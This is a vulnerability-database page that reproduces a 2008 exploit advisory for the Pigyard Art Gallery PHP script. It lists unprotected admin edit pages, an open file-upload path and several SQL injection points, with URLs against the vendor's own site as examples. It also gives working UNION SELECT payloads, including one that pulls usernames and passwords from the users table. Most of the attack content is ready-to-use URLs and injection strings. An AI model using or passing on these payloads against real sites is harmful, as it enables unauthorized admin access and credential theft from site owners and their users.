Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pigyard art Gallery - Multiple Vulnerabilities

🗓️ 24 Feb 2008 00:00:00Reported by ZoRLuType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 30 Views

Pigyard Art Gallery - Multiple Remote Vulnerabilities. Vulnerabilities found in Pictures Edit & Add, Availibility Edit & Add, Exhibitions Edit & Add, Genres Edit & Add, Media Edit & Add, Artist Edit & Add, Empty Artists and Exhibitions Edit & Add, and File Upload. SQL injections exist for artist, exhibition, and show picture full

Code
###################################################################

Pigyard Art Gallery Multiple Remote Vulnerabilities

Script Buy Now : http://www.pigyardgallery.com/how_to_buy.php 

author: ZoRLu     

home: www.yildirimordulari.org

contact: [email protected]

not: msn i ekleyipte aptal aptal konusmayýn yok ben seni eklemedim sen beni ekledin vs. sorularýnýz varsa sorarsýnýz cins cins konuþacaksanýz eklemeyin. 

##################################################################

Pigyard Art Gallery not to login admin. but the edit config web site 

this exploit:

Pictures Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_pictures

example web sites:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures

Availibility Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_availibilities

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities

Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_exhibitions

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions

Genres Edit & Add: 

http://localhost/module.php?module=gallery&modPage=view_genres

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genres

Media Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_media

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media

Artist Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_artists

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists

Empty Artists and Exhibitions Edit & Add:

http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates

example:

http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates


#########################################################################

File Upload:

http://localhost/php/templates/file_uploader/file_selector.php

example:

http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php


#######################################################################

SQL inj.

exploit 1:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=[SQL]

exploit 2:

http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]

exploit 3:

http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example web site:


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]


http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]


example [SQL] : 

-1/**/union/**/select/**/0,1,2,3,4/*   ( to me don't script available. so table name and columns name not find. but this to script sql inj available)

##########################################################################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r,  KoDLoK(vur6un), siircicocuk, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :))  )

Efsane: YILDIRIMORDULARI.ORG

######################################################################


Added a default sql injection string by Aria-Security Team     /str0ke

Aria-Security Team, 
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal, iM4N, Kinglet,
Vendor: Pigyard Art Gallery Multiple SQL Injection
This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181)

Original Link: http://forum.aria-security.net/showthread.php?p=1474

module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*
module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*


Regards,
The-0utl4w





# milw0rm.com [2008-02-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
remote vulnerabilitiespictures editavailibility editexhibitions editgenres editmedia editartist editempty artistsfile uploadsql injection
30